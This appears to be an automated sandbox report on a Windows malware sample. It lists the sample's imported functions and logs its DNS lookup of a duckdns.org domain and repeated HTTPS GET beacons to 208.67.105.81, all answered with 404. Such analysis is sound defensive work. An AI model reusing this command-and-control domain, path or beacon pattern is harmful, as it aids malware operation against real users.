                user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                kernel32.dllSleep
                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                shell32.dllShellExecuteA
                comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                winmm.dllsndPlaySoundA
                kernel32VirtualProtect, GetProcAddress
                URLAddMIMEFileTypesPS

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                GermanGermany

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 12:10:27.664222002 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:27.664259911 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:27.664347887 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:27.698299885 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:27.698340893 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:27.767555952 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:27.767760038 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.282234907 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.282279968 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.282612085 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.282723904 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.285423994 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.312993050 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.313083887 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.313414097 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.313426971 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.316231012 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.316271067 CEST44349738208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.316296101 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.316365004 CEST49738443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.744796991 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.744879007 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.745002985 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.780292034 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.780314922 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.838876963 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.838969946 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.845472097 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.845498085 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.849828959 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.849849939 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.893598080 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.893680096 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.893716097 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.893748999 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.895889044 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.895941973 CEST44349739208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:28.895997047 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:28.896064997 CEST49739443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.333664894 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.333718061 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.333811045 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.335076094 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.335097075 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.396907091 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.397332907 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.398082018 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.398096085 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.402986050 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.403003931 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.453963041 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.454068899 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.454097986 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.454127073 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.454157114 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.454363108 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.461920023 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.461951971 CEST44349741208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:29.461965084 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:29.462007999 CEST49741443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.087635994 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.087687969 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.088911057 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.090018034 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.090034962 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.150890112 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.153515100 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.168245077 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.168292046 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.173702955 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.173739910 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.210469961 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.210539103 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.210602999 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.210623026 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.229291916 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.229368925 CEST44349744208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.229403019 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.230700970 CEST49744443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.809607029 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.809642076 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.809729099 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.810214043 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.810223103 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.873605967 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.873707056 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.877444029 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.877464056 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.881510973 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.881530046 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.928128004 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.928210020 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.928260088 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.928307056 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.936168909 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.936203957 CEST44349748208.67.105.81192.168.2.6
                Aug 5, 2022 12:10:30.936216116 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:30.936266899 CEST49748443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:31.464025974 CEST49754443192.168.2.6208.67.105.81
                Aug 5, 2022 12:10:31.464075089 CEST44349754208.67.105.81192.168.2.6

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 12:10:27.529762030 CEST5520153192.168.2.68.8.8.8
                Aug 5, 2022 12:10:27.636805058 CEST53552018.8.8.8192.168.2.6

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 5, 2022 12:10:27.529762030 CEST192.168.2.68.8.8.80x92e3Standard query (0)aubromaterkiddie.duckdns.orgA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 5, 2022 12:10:27.636805058 CEST8.8.8.8192.168.2.60x92e3No error (0)aubromaterkiddie.duckdns.org208.67.105.81A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • aubromaterkiddie.duckdns.org

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.649738208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:28 UTC0OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:28 UTC0INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:28 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.649739208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:28 UTC0OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:28 UTC0INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:28 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.649771208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:35 UTC4OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:36 UTC4INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:35 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:36 UTC4INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                100192.168.2.649896208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:06 UTC42OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:06 UTC42INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:06 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:06 UTC42INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                101192.168.2.649897208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:06 UTC42OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:06 UTC42INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:06 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:06 UTC42INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                102192.168.2.649898208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:06 UTC43OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:06 UTC43INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:06 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:06 UTC43INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                103192.168.2.649899208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:06 UTC43OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:06 UTC43INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:06 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:06 UTC43INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                104192.168.2.649900208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:07 UTC43OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:07 UTC44INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:07 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:07 UTC44INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                105192.168.2.649901208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:07 UTC44OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:07 UTC44INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:07 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:07 UTC44INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                106192.168.2.649902208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:07 UTC44OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:07 UTC44INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:07 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:07 UTC45INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                107192.168.2.649904208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:07 UTC45OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:07 UTC45INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:07 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
